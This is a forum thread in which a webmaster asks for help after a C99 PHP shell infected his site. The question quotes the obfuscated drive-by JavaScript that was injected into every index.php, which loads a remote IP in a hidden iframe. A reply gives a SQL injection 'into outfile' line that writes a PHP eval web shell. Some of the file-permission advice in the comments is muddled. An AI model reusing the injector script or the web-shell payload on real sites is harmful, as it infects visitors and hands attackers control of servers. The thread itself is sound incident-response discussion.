Protect website from Backdoor/PHP.C99Shell aka Trojan.Script.224490

My website was infected by a trojan script.

Somebody managed to create/upload a file called "x76x09.php" or "config.php" into my webspace's root directory. Its size is 44287 bytes and its MD5 checksum is 8dd76fc074b717fccfa30b86956992f8. I've analyzed this file using Virustotal. These results say it's "Backdoor/PHP.C99Shell" or "Trojan.Script.224490".

This file has been executed in the same moment when it was created. So it must have happened automatically. This file added the following malicious code to the end of every index.php on my webspace.

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

After that code was on my page, users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.

The infection did happen although I have allow_url_fopen and allow_url_include turned off. And my hoster says the file wasn't uploaded via FTP.

So my questions are:

• What does the malicious code do? How is it encoded?
• How could the remote file ("x76x09.php" or "config.php") come to my webspace? SQL injection? Virus on my own PC?
• How can I protect my website from such attacks in the future?

Thank you very much in advance! I really need help.

This question is similar. But it's more like a report. I didn't know it's a virus from the beginning. So this question here refers to the virus itself, the other question does not.

@The Rook: You highly doubt what?

@Kranu that is one of over 6,000 ways it could have happened. You should read my response.

Thank you very much! (1) I haven't installed any php libraries on my own. Just my hoster. But I'm sure my hoster does his job. (3) Can I assign "544" or "444" to all of my project files? I edit them via FTP so why give write rights? "500" doesn't work. Error messages appear!? (4) I changed the passwords. I asked my hoster if I can use sftp or ftps. (5) I don't know how to change these privileges. But until now, my PHP scripts used the global MySQL user. This is a big mistake, right? I created another user, just for this database.

Thanks for the answer! But no, I don't have any upload scripts on my webspace. If it's a directory browser: Could the attacker view my config php files where my MySQL data is saved?

@marco92w No, the last 2 digits must always be zeros. If you are getting errors then the ownership is incorrect. chmod 555 will work for now, but its a terrible practice. You never want to give all users access to your files. Yes using a global mysql user is a very serious mistake. If everything is up to date i think that someone else on the host box hacked your site, what you are describing is terrible.

Thanks! (A) "whoami" gives me "nobody" as the response!? (B) Why not "444" for files and "555" for directories? Then nobody has write privileges, correct? (C) I've changed the PHP scripts' user to a non-global user. And I changed MySQL's and FTP's password. Is this enough?

I use FTPES instead of FTP now.

@marco92w to be technical, 111 is execute privileges, which is what php needs and this will prevent other users from reading your files (like your db password!!!), i'm pretty sure this works although i haven't tested it. 444 is read permissions which is needed by static files (.js .html .jpg). If you are running as "nobdy" then i'm pretty sure you have to give everybody rights. As long as you have done everything on my list, and do a chmod 111 on all your php files, then you should be good to go. Just changing the permissions isn't enough.

So long as the script has read permissions on your config.php files, yes, it can read it. If they want to read your MySQL data, they could just upload a PHP file to extract all the data it can find.

@The Rook: You posted your response after my comment.

@Kranu your right, but my point is that its more likely that sql injection is used to drop the file. In mysql you can exploit a query by injecting a union select into outfile at the end of a query. For instance: select col from table where some=1 union select '<?php eval($_GET[e]);?>' into outfile '/var/www/backdoor.php'

Very interesting. I think this could really have been the leak. If my MySQL account doesn't have FILE privileges, this way of injection isn't possible anymore, is it?

No, "111" (only execute) for files doesn't work. But "444" (only read) does work. So should I assign "444" to all of my PHP files? And "555" to all directories? It wouldn't be possible to create a directory browser on my webspace any longer, would it?

@marco92w chmod 555 is read and execute, i'm not sure why that is required. Making your files globally readable is horrible, you need to move hosts.

@marco92w you can still use a union select to grab data from another database/table, such as the administrative username/password hash/salt and then break the password with John The Ripper. But into outfile and loadfile() are really useful for exploiting MySQL with sql injection. If MySQL is out of date it maybe possible to get remote code execution by using a buffer overflow using a malformed query.

Thank you! So you think my FileZilla was infected and uploaded the remote file to my server, right?